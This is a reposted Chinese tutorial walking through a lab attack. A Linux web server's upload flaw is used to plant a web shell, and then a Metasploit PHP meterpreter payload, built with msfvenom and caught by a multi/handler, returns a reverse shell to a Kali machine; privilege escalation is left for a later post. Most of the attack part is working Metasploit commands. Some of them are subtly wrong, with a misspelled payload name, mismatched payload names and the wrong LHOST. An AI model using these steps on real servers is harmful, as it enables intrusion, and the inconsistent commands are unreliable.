找回密码
 立即注册
Qt开源社区 门户 查看内容

msf实现linux shell反弹

2019-8-16 10:41| 发布者: admin| 查看: 747| 评论: 0

摘要: 运行环境:kali ip:192.168.123.90Linux ip:192.168.123.5Linux服务器上开有80端口,并且有上传漏洞,具体如何绕过就不多讲,主要讲的是msf生成木马反弹linux shell。话不多说,上传一句话,菜刀连接。然后打开 ...


运行环境:

kali       ip:192.168.123.90
Linux    ip:192.168.123.5

Linux服务器上开有80端口,并且有上传漏洞,具体如何绕过就不多讲,主要讲的是msf生成木马反弹linux shell。

话不多说,上传一句话,菜刀连接。



然后打开kali 并启动msf

进入 >   use exploit/multi/handler
设置 payload>   set payload php/metrpreter/reverse_tcp



设置IP  > set lhost 192.168.123.90



查看一下参数>show options



没啥问题开始监听>run



再在终端上生产msf木马

msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.123.5 LPORT=4444  -f raw > msf.php

然后将产生的木马用小马上传上去,并且在浏览器上访问



我们再看msf发现已经有会话反弹过来了,我们接下来看一下



然后我们查看并进入会话查看信息






进入shell



上面已经进入shell 并且执行的ls命令,下面让我们看下权限



是www权限,然后接下来开始提权,皮一下,提权手法见下一期分享。

本人也是小菜,望大佬勿喷。

有错的地方及时联系本人,本人会及时修改,谢谢大家关看,及时交流。



你可能喜欢

看我如何利用微信反弹shell

不知道密码的情况下hacking mysql并反弹shell

zabbix反弹shell并拿下系统root权限




----------------------------------------------------------------------------------------------------------------------
我们尊重原创,也注重分享,文章来源于微信公众号:黑白之道,建议关注公众号查看原文。如若侵权请联系qter@qter.org。
----------------------------------------------------------------------------------------------------------------------

鲜花

握手

雷人

路过

鸡蛋

公告
可以关注我们的微信公众号yafeilinux_friends获取最新动态,或者加入QQ会员群进行交流:190741849、186601429(已满) 我知道了